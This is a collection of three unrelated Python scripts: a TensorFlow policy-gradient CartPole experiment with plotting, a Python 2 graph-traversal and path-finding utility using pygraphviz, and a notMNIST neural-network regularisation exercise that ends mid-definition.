pi = tf.contrib.distributions.Bernoulli(dist_in)
pi_sample = pi.sample()
log_pi = pi.log_prob(y)
optimizer = tf.train.RMSPropOptimizer(alpha)
# global_step = tf.Variable()
# optimizer = tf.train.RMSPropOptimizer(alpha)
train = optimizer.minimize(-1.0 * expected_returns * log_pi)
# saver = tf.train.Saver()
# Create and initialize a session
sess = tf.Session()
sess.run(tf.global_variables_initializer())
def run_episode(environment, ep, render=False):
raw_reward = 0
discounted_reward = 0
cumulative_reward = []
discount = 1.0
states = []
actions = []
obs = environment.reset()
done = False
while not done:
states.append(obs)
cumulative_reward.append(discounted_reward)
if render and ((ep % VIDEO_INTERVAL) == 0):
environment.render()
action = sess.run(pi_sample, feed_dict={x: [obs]})[0]
actions.append(action)
obs, reward, done, info = env.step(action[0])
raw_reward += reward
if reward > 0:
discounted_reward += reward * discount
else:
discounted_reward += reward
discount *= gamma
return raw_reward, discounted_reward, cumulative_reward, states, actions
def display_weights(session):
global HIDDEN_LAYER
if HIDDEN_LAYER:
w1 = session.run(hidden_W)
b1 = session.run(hidden_B)
w2 = session.run(dist_W)
b2 = session.run(dist_B)
print(w1, b1, w2, b2)
else:
w1 = session.run(dist_W)
b1 = session.run(dist_B)
print(w1, b1)
returns_1 = []
mean_1 = []
for ep in range(MAX_EPISODES):
raw_G, discounted_G, cumulative_G, ep_states, ep_actions = \
run_episode(env, ep, RENDER)
expected_R = np.transpose([discounted_G - np.array(cumulative_G)])
sess.run(train, feed_dict={x: ep_states, y: ep_actions,
expected_returns: expected_R})
if DISPLAY_WEIGHTS:
display_weights(sess)
# saver.save(sess, "/home/yh/repo/sim_test/Feb/CartPoleData/model.ckpt")
returns_1.append(raw_G)
running_returns = returns_1[max(0, ep-CONSECUTIVE_TARGET):(ep+1)]
mean_returns = np.mean(running_returns)
mean_1.append(mean_returns)
msg = "Episode: {}, Return: {}, Last {} returns mean: {}"
msg = msg.format(ep+1, raw_G, CONSECUTIVE_TARGET, mean_returns)
print(msg)
env.close()
env = gym.make(ENVIRONMENT2)
env.seed(RANDOM_NUMBER_SEED)
# print("---------- MORPHING ----------")
# time.sleep(3)
returns_2 = []
mean_2 = []
for ep in range(MAX_EPISODES):
# saver.restore(sess, "/home/yh/repo/sim_test/Feb/CartPoleData/model.ckpt")
raw_G, discounted_G, cumulative_G, ep_states, ep_actions = \
run_episode(env, ep, RENDER)
expected_R = np.transpose([discounted_G - np.array(cumulative_G)])
sess.run(train, feed_dict={x: ep_states, y: ep_actions,
expected_returns: expected_R})
if DISPLAY_WEIGHTS:
display_weights(sess)
# saver.save(sess, "/home/yh/repo/sim_test/Feb/CartPoleData/model.ckpt")
returns_2.append(raw_G)
running_returns = returns_2[max(0, ep-CONSECUTIVE_TARGET):(ep+1)]
mean_returns = np.mean(running_returns)
mean_2.append(mean_returns)
msg = "Episode: {}, Return: {}, Last {} returns mean: {}"
msg = msg.format(ep+MAX_EPISODES+1, raw_G, CONSECUTIVE_TARGET, mean_returns)
print(msg)
env.close()
env = gym.make(ENVIRONMENT3)
env.seed(RANDOM_NUMBER_SEED)
returns_3 = []
mean_3 = []
for ep in range(MAX_EPISODES):
# saver.restore(sess, "/home/yh/repo/sim_test/Feb/CartPoleData/model.ckpt")
raw_G, discounted_G, cumulative_G, ep_states, ep_actions = \
run_episode(env, ep, RENDER)
expected_R = np.transpose([discounted_G - np.array(cumulative_G)])
sess.run(train, feed_dict={x: ep_states, y: ep_actions,
expected_returns: expected_R})
if DISPLAY_WEIGHTS:
display_weights(sess)
# saver.save(sess, "/home/yh/repo/sim_test/Feb/CartPoleData/model.ckpt")
returns_3.append(raw_G)
running_returns = returns_3[max(0, ep-CONSECUTIVE_TARGET):(ep+1)]
mean_returns = np.mean(running_returns)
mean_3.append(mean_returns)
msg = "Episode: {}, Return: {}, Last {} returns mean: {}"
msg = msg.format(ep+MAX_EPISODES*2+1, raw_G, CONSECUTIVE_TARGET, mean_returns)
print(msg)
env.close()
env = gym.make(ENVIRONMENT4)
env.seed(RANDOM_NUMBER_SEED)
returns_4 = []
mean_4 = []
for ep in range(MAX_EPISODES):
# saver.restore(sess, "/home/yh/repo/sim_test/Feb/CartPoleData/model.ckpt")
raw_G, discounted_G, cumulative_G, ep_states, ep_actions = \
run_episode(env, ep, RENDER)
expected_R = np.transpose([discounted_G - np.array(cumulative_G)])
sess.run(train, feed_dict={x: ep_states, y: ep_actions,
expected_returns: expected_R})
if DISPLAY_WEIGHTS:
display_weights(sess)
# saver.save(sess, "/home/yh/repo/sim_test/Feb/CartPoleData/model.ckpt")
returns_4.append(raw_G)
running_returns = returns_4[max(0, ep-CONSECUTIVE_TARGET):(ep+1)]
mean_returns = np.mean(running_returns)
mean_4.append(mean_returns)
msg = "Episode: {}, Return: {}, Last {} returns mean: {}"
msg = msg.format(ep+MAX_EPISODES*3+1, raw_G, CONSECUTIVE_TARGET, mean_returns)
print(msg)
returns_for_plot = np.concatenate((mean_1, mean_2, mean_3, mean_4), axis=0)
env.close()
env = gym.make(ENVIRONMENT4)
env.seed(RANDOM_NUMBER_SEED)
np.random.seed(RANDOM_NUMBER_SEED)
tf.set_random_seed(RANDOM_NUMBER_SEED)
returns_direct = []
mean_direct = []
sess.run(tf.global_variables_initializer())
for ep in range(MAX_EPISODES*4):
# saver.restore(sess, "/home/yh/repo/sim_test/Feb/CartPoleData/model.ckpt")
if ep % MAX_EPISODES == 0:
sess.run(tf.global_variables_initializer())
raw_G, discounted_G, cumulative_G, ep_states, ep_actions = \
run_episode(env, ep, RENDER)
expected_R = np.transpose([discounted_G - np.array(cumulative_G)])
sess.run(train, feed_dict={x: ep_states, y: ep_actions,
expected_returns: expected_R})
if DISPLAY_WEIGHTS:
display_weights(sess)
# saver.save(sess, "/home/yh/repo/sim_test/Feb/CartPoleData/model.ckpt")
returns_direct.append(raw_G)
running_returns = returns_direct[max(0, ep-CONSECUTIVE_TARGET):(ep+1)]
mean_returns = np.mean(running_returns)
mean_direct.append(mean_returns)
msg = "Episode: {}, Return: {}, Last {} returns mean: {}"
msg = msg.format(ep+1, raw_G, CONSECUTIVE_TARGET, mean_returns)
print(msg)
# Plot
plt.style.use('ggplot')
# plt.style.use('dark_background')
# Instant returns
# returns_for_plot = np.concatenate((returns_before_morph, returns_after_morph), axis=0)
# Mean returns
fig = plt.figure()
ax = fig.add_subplot(111)
fig.subplots_adjust(top=0.85)
ax.set_title("Pole Balancing with Morphing")
ax.set_xlabel("Episode")
ax.set_ylabel("Returns (Running Average)")
ax.plot(returns_for_plot, label='With Previous Experience')
ax.plot(mean_direct, label='Without Previous Experience')
# ax.axvline(x=MAX_EPISODES, linestyle='--')
ax.set_ylim((0, 220))
# ax.text(0, 25, "Parameters before morphing:\n \
# Pole length = 1.0 m \n \
# Pole mass = 0.1 kg \n \
# Cart mass = 1.0 kg \n \
# Force magnitude = 10 N", \
# bbox={'facecolor':(.118,.565,1.000, .3)})
# ax.text(MAX_EPISODES*21.0/20.0, 25, "Parameters after morphing:\n \
# Pole length = 1.25 m \n \
# Pole mass = 0.1 kg \n \
# Cart mass = 1.0 kg \n \
# Force magnitude = 10 N", \
# bbox={'facecolor':(.118,.565,1.000, .3)})
ax.axvline(x=MAX_EPISODES, linestyle='--', color='black')
ax.axvline(x=MAX_EPISODES*2, linestyle='--', color='black')
ax.axvline(x=MAX_EPISODES*3, linestyle='--', color='black')
ax.legend(loc='best')
# ax.annotate('Morphing', xy=(MAX_EPISODES, 100), \
# xytext=(MAX_EPISODES*6.0/5.0, 125), \
# arrowprops=dict(facecolor=(.118,.565,1.000, .3)))
# fig.savefig('/home/yh/repo/sim_test/Feb/CartPoleData/3p0.jpg')
plt.show()
|
|
#!/usr/bin/env python
# coding=utf-8
import pygraphviz as pgv
from pdb import *
gdata = [
['A', '->', 'B',1],
['A', '->', 'C',1],
['B', '->', 'C',1],
['B', '->', 'D',1],
['C', '->', 'D',1],
['D', '->', '',1],
]
graph = {
'A': ['B', 'C'],
'B': ['C', 'D'],
'C': ['D'],
'D':[]
}
def gen_edge_relations(graph):
graph_edge = {}
for node,neighbour_list in graph.iteritems():
node_relations = {}
for nb in neighbour_list:
node_relations[nb] = 1
#print node,neighbour_list,node_relations
if not graph_edge.has_key(node):
graph_edge[node] = node_relations
return graph_edge
def check_is_edge(graph_edge,_from,_to):
is_edge = False
if len(graph_edge)>0:
if graph_edge.has_key(_from):
node_relations = graph_edge[_from]
if node_relations.has_key(_to):
is_edge = True
return is_edge
def width_order_graph(graph):
graph_edge = gen_edge_relations(graph)
def BFS(node):
print(node)
visited[node] = 1
for _node,_node_relations in graph.iteritems():
if check_is_edge(graph_edge,node,_node) and not visited.has_key(_node):
BFS(_node)
visited = {}
#set_trace()
for node,node_relations in graph.iteritems():
if not visited.has_key(node):
print 'start BFS:',node
BFS(node)
print visited
def depth_order_graph(graph):
graph_edge = gen_edge_relations(graph)
def DFS(node,queue):
queue.append(node)
print(node)
visited[node] = 1
if len(queue) != 0:
q_node = queue.pop()
for _node,_node_relations in graph.iteritems():
if check_is_edge(graph_edge,q_node,_node) and not visited.has_key(_node):
DFS(_node, queue)
visited = {}
queue = []
for node,node_relations in graph.iteritems():
if not visited.has_key(node):
DFS(node,queue)
def build_graph(data):
graph = {}
for r in gdata:
_from = r[0]
to = r[2]
status = r[3]
if status!=1:
continue
if _from=='D':
set_trace()
if not graph.has_key(_from):
graph[_from] = [to]
else:
graph[_from].append(to)
return graph
def add_node(graph,_from,to):
#set_trace()
if len(graph)>0:
if not graph.has_key(_from):
graph[_from] = [to]
else:
graph[_from].append(to)
#fix add leaf node
if not graph.has_key(to):
graph[to] = []
else:
graph[_from] =[to]
return graph
def del_node(graph,_from,to):
if len(graph)>0:
#del edge
if graph.has_key(_from):
graph[_from].remove(to)
#del to -if leaf
if graph.has_key(to):
t = graph[to]
if len(t)==0:
graph.pop(to)
return graph
def find_path(graph, start, end, path=[]):
path = path + [start]
if start == end:
return path
if not graph.has_key(start):
return None
for node in graph[start]:
if node not in path:
newpath = find_path(graph, node, end, path)
if newpath:
return newpath
return None
def find_path2 (graph, start, end, path=[]):
_path = path + [start]
if start == end:
return path
if not graph.has_key(start):
return None
for node in graph[start]:
if node not in _path:
newpath = find_path(graph, node, end, _path)
if newpath:
return newpath
return None
def find_all_paths(graph, start, end, path=[]):
path = path + [start]
if start == end:
return [path]
if not graph.has_key(start):
return []
paths = []
for node in graph[start]:
if node not in path:
newpaths = find_all_paths(graph, node, end, path)
for newpath in newpaths:
paths.append(newpath)
return paths
"""
find from ->to ,[from]->from_list
"""
def find_from_path(graph,to):
path = []
graph_edge = gen_edge_relations(graph)
for node,node_relations in graph_edge.iteritems():
if node_relations.has_key(to):
path.append(node)
return path
"""
find x->from ->to ,[from]+[x]->from_list
"""
def find_from_path_all(graph,to,path=[]):
if to not in path:
path = path+[to]
#print path,to in path
graph_edge = gen_edge_relations(graph)
for node,node_relations in graph_edge.iteritems():
if node_relations.has_key(to):
if not node in path:
path.append(node)
find_from_path_all(graph,node,path)
return path
"""
find x->from ->to ,[from]+[x]->from_list
"""
def find_from_path_all_depth_order_graph(graph,to):
graph_edge = gen_edge_relations(graph)
def DFS(node,queue):
queue.append(node)
#print(node)
if len(queue) != 0:
q_node = queue.pop()
for _node,_node_relations in graph_edge.iteritems():
if _node_relations.has_key(q_node) and not visited.has_key(_node):
visited[_node] = 1
#visited[_node] = 1
DFS(_node, queue)
visited = {}
queue = []
node = to
DFS(node,queue)
return visited
"""
find x->from ->to ,[from]+[x]->from_list
"""
def find_to_path_all_depth_order_graph(graph,_from):
def DFS(node,queue):
queue.append(node)
print(node)
visited[node]=1
if len(queue) != 0:
q_node = queue.pop()
for neighbour in graph[q_node]:
queue.append(neighbour)
#if graph.has_key(neighbour) and not visited.has_key(neighbour):
if graph.has_key(neighbour):
DFS(neighbour,queue)
visited = {}
queue = []
node = _from
DFS(node,queue)
return visited
def find_shortest_path(graph, start, end, path=[]):
path = path + [start]
if start == end:
return path
if not graph.has_key(start):
return None
shortest = None
for node in graph[start]:
if node not in path:
newpath = find_shortest_path(graph, node, end, path)
if newpath:
if not shortest or len(newpath) < len(shortest):
shortest = newpath
return shortest
def gen_graph_png(graph,file_name):
A=pgv.AGraph(directed=True,strict=True)
for node,node_relations_list in graph.iteritems():
for neighbour in node_relations_list:
A.add_edge(node,neighbour)
A.graph_attr['epsilon']='0.1'
print A.string() # print dot file to standard output
A.write(file_name+'.dot')
A.layout('dot') # layout with dot
A.draw(file_name+'.gif') # write to file
print 'success'
def graph_tree_test():
A=pgv.AGraph(directed=True,strict=True)
A.node_attr['style']='filled'
A.node_attr['shape']='circle'
A.node_attr['fixedsize']='true'
A.node_attr['fontcolor']='#FFFFFF'
A.add_edge(1,2)
A.add_edge(1,3)
A.add_edge(2,4)
A.add_edge(2,5)
A.add_edge(5,6)
A.add_edge(5,7)
A.add_edge(3,8)
A.add_edge(3,9)
A.add_edge(8,10)
A.add_edge(8,11)
A.graph_attr['epsilon']='0.001'
print A.string() # print dot file to standard output
A.write('tree.dot')
A.layout('dot') # layout with dot
A.draw('tree.png') # write to file
print 'success'
def test_find(graph):
print '--find A-E one path--'
t= find_path(graph, 'A', 'E')
print t
t= find_path2(graph, 'A', 'E')
print t
print '--find A-E all paths-'
t = find_all_paths(graph, 'A', 'E')
print t
print '--find A-E short path-'
t= find_shortest_path(graph, 'A', 'E')
print t
def test_find_from_path(graph):
print '--find from node directly--'
t=find_from_path(graph,'D')
print t
print '--find_from_path_all--'
t = find_from_path_all(graph,'D')
print t
t = find_from_path_all_depth_order_graph(graph,'D')
print t
t = find_to_path_all_depth_order_graph(graph,'A')
print t
print graph
def test_update(graph):
graph = add_node(graph,'D','E')
print graph
"""
{'A': ['B', 'C'], 'C': ['D'], 'B': ['C', 'D'], 'D': ['E']}
"""
print '--add_node-E-F-'
graph = add_node(graph,'E','F')
print '--del_node leaf-E-F'
del_node(graph,'E','F')
print graph
print '--del_node leaf-C-D'
del_node(graph,'C','D')
print graph
print '--del_node leaf-B-D'
del_node(graph,'B','D')
print graph
depth_order_graph(graph)
def test_order(graph):
print '--width_order_graph--'
width_order_graph(graph)
print '--depth_order_graph--'
depth_order_graph(graph)
def test_utils(graph):
g = build_graph(gdata)
print g
print '--gen all graph_edge relations-'
graph_edge = gen_edge_relations(graph)
print graph_edge
print '--check_is_edge--'
t= check_is_edge(graph_edge,'A','B')
print t
if __name__=='__main__':
#test_find_from_path(graph)
#graph_tree_test()
gen_graph_png(graph,'path')
|
|
# These are all the modules we'll be using later. Make sure you can import them
# before proceeding further.
from __future__ import print_function
import numpy as np
import tensorflow as tf
from six.moves import cPickle as pickle
# pickle_file = 'notMNIST.pickle'
pickle_file = 'notMNIST_santinized.pickle'
with open(pickle_file, 'rb') as f:
save = pickle.load(f)
train_dataset = save['train_dataset']
train_labels = save['train_labels']
valid_dataset = save['valid_dataset']
valid_labels = save['valid_labels']
test_dataset = save['test_dataset']
test_labels = save['test_labels']
del save # hint to help gc free up memory
print('Training set', train_dataset.shape, train_labels.shape)
print('Validation set', valid_dataset.shape, valid_labels.shape)
print('Test set', test_dataset.shape, test_labels.shape)
image_size = 28
num_labels = 10
def reformat(dataset, labels):
dataset = dataset.reshape((-1, image_size**2)).astype(np.float32)
labels = (np.arange(num_labels) == labels[:, np.newaxis]).astype(np.float32)
return dataset, labels
train_dataset, train_labels = reformat(train_dataset, train_labels)
valid_dataset, valid_labels = reformat(valid_dataset, valid_labels)
test_dataset, test_labels = reformat(test_dataset, test_labels)
print('Training set', train_dataset.shape, train_labels.shape)
print('Validation set', valid_dataset.shape, valid_labels.shape)
print('Test set', test_dataset.shape, test_labels.shape)
## problem 1
# without regularization.
# train %82.8%
# CV %82.3%
# test %89.0%
# # With gradient descent training, even this much data is prohibitive.
# # Subset the training data for faster turnaround.
# train_subset = 10000
#
# graph = tf.Graph()
# with graph.as_default():
#
# # Input data.
# # Load the training, validation and test data into constants that are
# # attached to the graph.
# tf_train_dataset = tf.constant(train_dataset[:train_subset, :])
# tf_train_labels = tf.constant(train_labels[:train_subset])
# tf_valid_dataset = tf.constant(valid_dataset)
# tf_test_dataset = tf.constant(test_dataset)
#
# # Variables.
# # These are the parameters that we are going to be training. The weight
# # matrix will be initialized using random values following a (truncated)
# # normal distribution. The biases get initialized to zero.
# weights = tf.Variable(
# tf.truncated_normal([image_size * image_size, num_labels]))
# biases = tf.Variable(tf.zeros([num_labels]))
#
# # Training computation.
# # We multiply the inputs with the weight matrix, and add biases. We compute
# # the softmax and cross-entropy (it's one operation in TensorFlow, because
# # it's very common, and it can be optimized). We take the average of this
# # cross-entropy across all training examples: that's our loss.
# logits = tf.matmul(tf_train_dataset, weights) + biases # the model ouputs before softmax called logits.
# loss = tf.reduce_mean(
# tf.nn.softmax_cross_entropy_with_logits(logits, tf_train_labels))
#
# # Optimizer.
# # We are going to find the minimum of this loss using gradient descent.
# optimizer = tf.train.GradientDescentOptimizer(0.5).minimize(loss) # optimizer is the same thing to solver in sklearn
#
# # Predictions for the training, validation, and test data.
# # These are not part of training, but merely here so that we can report
# # accuracy figures as we train.
# train_prediction = tf.nn.softmax(logits)
# valid_prediction = tf.nn.softmax(
# tf.matmul(tf_valid_dataset, weights) + biases)
# test_prediction = tf.nn.softmax(tf.matmul(tf_test_dataset, weights) + biases)
#
#
# num_steps = 801
#
#
# def accuracy(predictions, labels):
# return (100.0 * np.sum(np.argmax(predictions, 1) == np.argmax(labels, 1))# along axis=1 means by row.
# / predictions.shape[0])
#
#
# with tf.Session(graph=graph) as session:
# # This is a one-time operation which ensures the parameters get initialized as
# # we described in the graph: random weights for the matrix, zeros for the
# # biases.
# tf.global_variables_initializer().run()
# print('Initialized')
# for step in range(num_steps):
# # Run the computations. We tell .run() that we want to run the optimizer,
# # and get the loss value and the training predictions returned as numpy
# # arrays.
# _, l, predictions = session.run([optimizer, loss, train_prediction])
# if (step % 100 == 0):
# print('Loss at step %d: %f' % (step, l))
# print('Training accuracy: %.1f%%' % accuracy(
# predictions, train_labels[:train_subset, :]))
# # Calling .eval() on valid_prediction is basically like calling run(), but
# # just to get that one numpy array. Note that it recomputes all its graph
# # dependencies.
# print('Validation accuracy: %.1f%%' % accuracy(
# valid_prediction.eval(), valid_labels))
# print('Test accuracy: %.1f%%' % accuracy(test_prediction.eval(), test_labels))
#
#
# grid_lambda = np.array([1.0, 0.3, 0.1, 0.03, 0.01])
# train_subset = 10000
#
# for regular_lambda in grid_lambda:
# print('\nregularization coefficient: ', regular_lambda)
# graph = tf.Graph()
# with graph.as_default():
#
# # Input data.
# # Load the training, validation and test data into constants that are
# # attached to the graph.
# tf_train_dataset = tf.constant(train_dataset[:train_subset, :])
# tf_train_labels = tf.constant(train_labels[:train_subset])
# tf_valid_dataset = tf.constant(valid_dataset)
# tf_test_dataset = tf.constant(test_dataset)
#
# # Variables.
# # These are the parameters that we are going to be training. The weight
# # matrix will be initialized using random values following a (truncated)
# # normal distribution. The biases get initialized to zero.
# weights = tf.Variable(
# tf.truncated_normal([image_size * image_size, num_labels]))
# biases = tf.Variable(tf.zeros([num_labels]))
#
# # Training computation.
# # We multiply the inputs with the weight matrix, and add biases. We compute
# # the softmax and cross-entropy (it's one operation in TensorFlow, because
# # it's very common, and it can be optimized). We take the average of this
# # cross-entropy across all training examples: that's our loss.
# logits = tf.matmul(tf_train_dataset, weights) + biases # the model ouputs before softmax called logits.
# loss = tf.reduce_mean(
# tf.nn.softmax_cross_entropy_with_logits(logits, tf_train_labels)
# + regular_lambda*tf.nn.l2_loss(weights))
#
# # Optimizer.
# # We are going to find the minimum of this loss using gradient descent.
# optimizer = tf.train.GradientDescentOptimizer(0.5).minimize(
# loss) # optimizer is the same thing to solver in sklearn
#
# # Predictions for the training, validation, and test data.
# # These are not part of training, but merely here so that we can report
# # accuracy figures as we train.
# train_prediction = tf.nn.softmax(logits)
# valid_prediction = tf.nn.softmax(
# tf.matmul(tf_valid_dataset, weights) + biases)
# test_prediction = tf.nn.softmax(tf.matmul(tf_test_dataset, weights) + biases)
#
# num_steps = 801
#
#
# def accuracy(predictions, labels):
# return (100.0 * np.sum(np.argmax(predictions, 1) == np.argmax(labels, 1)) # along axis=1 means by row.
# / predictions.shape[0])
#
#
# with tf.Session(graph=graph) as session:
# # This is a one-time operation which ensures the parameters get initialized as
# # we described in the graph: random weights for the matrix, zeros for the
# # biases.
# tf.global_variables_initializer().run()
# print('Initialized')
# for step in range(num_steps):
# # Run the computations. We tell .run() that we want to run the optimizer,
# # and get the loss value and the training predictions returned as numpy
# # arrays.
# _, l, predictions = session.run([optimizer, loss, train_prediction])
# if (step % 100 == 0):
# print('Loss at step %d: %f' % (step, l))
# print('Training accuracy: %.1f%%' % accuracy(
# predictions, train_labels[:train_subset, :]))
# # Calling .eval() on valid_prediction is basically like calling run(), but
# # just to get that one numpy array. Note that it recomputes all its graph
# # dependencies.
# print('Validation accuracy: %.1f%%' % accuracy(
# valid_prediction.eval(), valid_labels))
# print('Test accuracy: %.1f%%' % accuracy(test_prediction.eval(), test_labels))
#
# ## SGD with LR// solver='sag' in sklearn.
# grid_lambda = np.array([1.0, 0.3, 0.1, 0.03, 0.01, 0.003, 0.001])
#
# batch_size = 128
# for regular_lambda in grid_lambda:
# print('regularization coefficient:', regular_lambda)
# graph = tf.Graph()
# with graph.as_default():
#
# # Input data. For the training data, we use a placeholder that will be fed
# # at run time with a training minibatch.
# tf_train_dataset = tf.placeholder(tf.float32,
# shape=(batch_size, image_size * image_size))
# tf_train_labels = tf.placeholder(tf.float32, shape=(batch_size, num_labels))
# tf_valid_dataset = tf.constant(valid_dataset)
# tf_test_dataset = tf.constant(test_dataset)
#
# # Variables.
# weights = tf.Variable(
# tf.truncated_normal([image_size * image_size, num_labels]))
# biases = tf.Variable(tf.zeros([num_labels]))
#
# # Training computation.
# logits = tf.matmul(tf_train_dataset, weights) + biases
#
# # add regularization into loss
# loss = tf.reduce_mean(
# tf.nn.softmax_cross_entropy_with_logits(logits, tf_train_labels)
# + regular_lambda*tf.nn.l2_loss(weights))
#
# # Optimizer.
# optimizer = tf.train.GradientDescentOptimizer(0.5).minimize(loss)
#
# # Predictions for the training, validation, and test data.
# train_prediction = tf.nn.softmax(logits)
# valid_prediction = tf.nn.softmax(
# tf.matmul(tf_valid_dataset, weights) + biases)
# test_prediction = tf.nn.softmax(tf.matmul(tf_test_dataset, weights) + biases)
#
# num_steps = 3001
#
#
# def accuracy(predictions, labels):
# return (100.0 * np.sum(np.argmax(predictions, 1) == np.argmax(labels, 1)) # along axis=1 means by row.
# / predictions.shape[0])
#
#
# with tf.Session(graph=graph) as session:
# tf.global_variables_initializer().run()
# print("Initialized")
# for step in range(num_steps):
# # Pick an offset within the training data, which has been randomized.
# # Note: we could use better randomization across epochs.
# offset = (step * batch_size) % (train_labels.shape[0] - batch_size)
# # Generate a minibatch.
# batch_data = train_dataset[offset:(offset + batch_size), :]
# batch_labels = train_labels[offset:(offset + batch_size), :]
# # Prepare a dictionary telling the session where to feed the minibatch.
# # The key of the dictionary is the placeholder node of the graph to be fed,
# # and the value is the numpy array to feed to it.
# feed_dict = {tf_train_dataset: batch_data, tf_train_labels: batch_labels}
# _, l, predictions = session.run(
# [optimizer, loss, train_prediction], feed_dict=feed_dict)
# if (step % 500 == 0):
# print("Minibatch loss at step %d: %f" % (step, l))
# print("Minibatch accuracy: %.1f%%" % accuracy(predictions, batch_labels))
# print("Validation accuracy: %.1f%%" % accuracy(
# valid_prediction.eval(), valid_labels))
# print("Test accuracy: %.1f%%" % accuracy(test_prediction.eval(), test_labels))
# best hyper-parameters [0.001, 0.001]
# Minibatch accuracy: 85.2%
# Validation accuracy: 87.1%
# Testing accuracy: 93.1%
# learning rate decay
# Minibatch accuracy: 83.6%
# Validation accuracy: 84.9%
# Testing accuracy: 91.3%
# dropout
# Minibatch accuracy: 73.4%
# Validation accuracy: 84.8%
# Testing accuracy: 91.3%
#
# grid_lambda = np.array([0.001])
# # batch_size = 50 # test for dropout
# batch_size = 128
# h1_length = 1024
# num_steps = 3001
# for regular_lambda1 in grid_lambda:
# for regular_lambda2 in grid_lambda:
# print('\nregularization coefficient:(%f, %f)' % (regular_lambda1, regular_lambda2))
# graph = tf.Graph()
# with graph.as_default():
# keep_prob = tf.placeholder(dtype=tf.float32, shape=())
# tf_train_dataset = tf.placeholder(dtype=tf.float32, shape=(batch_size, image_size**2))
# tf_train_labels = tf.placeholder(dtype=tf.float32, shape=(batch_size, num_labels))
# tf_valid_dataset = tf.constant(valid_dataset)
# tf_test_dataset = tf.constant(test_dataset)
#
# global_step = tf.Variable(0) # count the number of steps taken.
# # learning_rate = tf.train.exponential_decay(0.5, global_step, decay_rate=0.96, decay_steps=num_steps/(np.log(0.1/0.5)/np.log(0.96)))
# learning_rate = 0.5
# weights1 = tf.Variable(tf.truncated_normal([image_size**2, h1_length]))
# biases1 = tf.Variable(tf.zeros([h1_length]))
#
# #dropout: the size of mini-batch cannot be too small.
# # I think we could use sigmoid function to substitute the softmax in case of NaN in loss.
# # logits1 = tf.nn.relu(tf.matmul(tf_train_dataset, weights1) + biases1)
# logits1 = tf.nn.dropout(x=tf.nn.relu(tf.matmul(tf_train_dataset, weights1) + biases1), keep_prob=keep_prob)
#
# weights2 = tf.Variable(tf.truncated_normal([h1_length, num_labels]))
# biases2 = tf.Variable(tf.zeros([num_labels]))
#
# # logits2 = tf.nn.relu(tf.matmul(logits1, weights2) + biases2)
# logits2 = tf.matmul(logits1, weights2) + biases2
# loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits2, tf_train_labels)
# + regular_lambda1*tf.nn.l2_loss(weights1)
# + regular_lambda2*tf.nn.l2_loss(weights2))
#
# # optimizer = tf.train.GradientDescentOptimizer(0.5).minimize(loss)
# optimizer = tf.train.GradientDescentOptimizer(learning_rate).minimize(loss,global_step=global_step)
#
# train_prediction = tf.nn.softmax(logits2)
# valid_prediction = tf.nn.softmax(tf.matmul(tf.nn.relu(tf.matmul(tf_valid_dataset, weights1) + biases1)
# , weights2) + biases2)
# test_prediction = tf.nn.softmax(tf.matmul(tf.nn.relu(tf.matmul(tf_test_dataset, weights1) + biases1)
# , weights2) + biases2)
#
#
# def accuracy(predictions, labels):
# return 100.0 * np.sum(np.argmax(predictions, 1) == np.argmax(labels, 1)) / predictions.shape[0]
#
#
#
# with tf.Session(graph=graph) as session:
# tf.global_variables_initializer().run()
# for step in range(num_steps):
# offset = batch_size*step % (train_labels.shape[0]-batch_size)
# batch_data = train_dataset[offset:(offset+batch_size),:]
# batch_labels = train_labels[offset:(offset+batch_size),:]
# feed_dict = {tf_train_dataset: batch_data, tf_train_labels: batch_labels, keep_prob: 1}
# # feed_dict = {tf_train_dataset: batch_data, tf_train_labels: batch_labels, keep_prob: 0.5}
# _, l, predictions = session.run([optimizer, loss, train_prediction], feed_dict=feed_dict)
# if step % 500 == 0:
# print("Minibatch loss at step %d: %f" % (step, l))
# print("Minibatch accuracy: %.1f%%" % accuracy(predictions, batch_labels))
# print("Validation accuracy: %.1f%%" % accuracy(
# valid_prediction.eval(), valid_labels))
# print('Testing accuracy: %.1f%%' % accuracy(test_prediction.eval(), test_labels))
# deep learning
# best_hypers
# '95.29': (0.001, 0.001, 0.0003, 0.0003, 0.001, 0.0003)
grid_lambda = np.array([[0.001],
[0.001],
[0.0003],
[0.0003],
[0.001],
[0.0003]
])
# batch_size = 50 # test for dropout
# batch_size = 128
# batch_size = 50
batch_size = 256
h1_length = 1024
h2_length = h1_length//3
h3_length = h2_length//3
h4_length = h3_length//3
h5_length = h4_length//3
num_steps = 3001
best_hyper = {}
for regular_lambda1 in grid_lambda[0]:
for regular_lambda2 in grid_lambda[1]:
for regular_lambda3 in grid_lambda[2]:
for regular_lambda4 in grid_lambda[3]:
for regular_lambda5 in grid_lambda[4]:
for regular_lambda6 in grid_lambda[5]:
print('\nregularization coefficient:(%f, %f, %f, %f, %f, %f)' % (regular_lambda1, regular_lambda2, regular_lambda3, regular_lambda4, regular_lambda5, regular_lambda6))
graph = tf.Graph()
with graph.as_default():
keep_prob = tf.placeholder(dtype=tf.float32, shape=())
tf_train_dataset = tf.placeholder(dtype=tf.float32, shape=(batch_size, image_size**2))
tf_train_labels = tf.placeholder(dtype=tf.float32, shape=(batch_size, num_labels))
tf_valid_dataset = tf.constant(valid_dataset)
tf_test_dataset = tf.constant(test_dataset)
global_step = tf.Variable(0) # count the number of steps taken.
initial_learning_rate = 0.5
final_learning_rate = 0.01
decay_rate = 0.96
learning_rate = tf.train.exponential_decay(initial_learning_rate, global_step, decay_rate=decay_rate, decay_steps=num_steps/(np.log(final_learning_rate/initial_learning_rate)/np.log(decay_rate)))
# learning_rate = 0.5
# weights1 = tf.Variable(tf.truncated_normal([image_size**2, h1_length]))
weights1 = tf.get_variable('weights1', [image_size**2, h1_length], initializer=tf.contrib.layers.xavier_initializer())
biases1 = tf.Variable(tf.zeros([h1_length]))
logits1 = tf.nn.dropout(x=tf.nn.relu(tf.matmul(tf_train_dataset, weights1) + biases1), keep_prob=keep_prob)
weights2 = tf.get_variable('weights2', [h1_length, h2_length], initializer=tf.contrib.layers.xavier_initializer())
biases2 = tf.Variable(tf.zeros([h2_length]))
logits2 = tf.nn.dropout(x=tf.nn.relu(tf.matmul(logits1, weights2) + biases2), keep_prob=keep_prob)
weights3 = tf.get_variable('weights3', [h2_length, h3_length], initializer=tf.contrib.layers.xavier_initializer())
biases3 = tf.Variable(tf.zeros([h3_length]))
logits3 = tf.nn.dropout(x=tf.nn.relu(tf.matmul(logits2, weights3) + biases3), keep_prob=keep_prob)
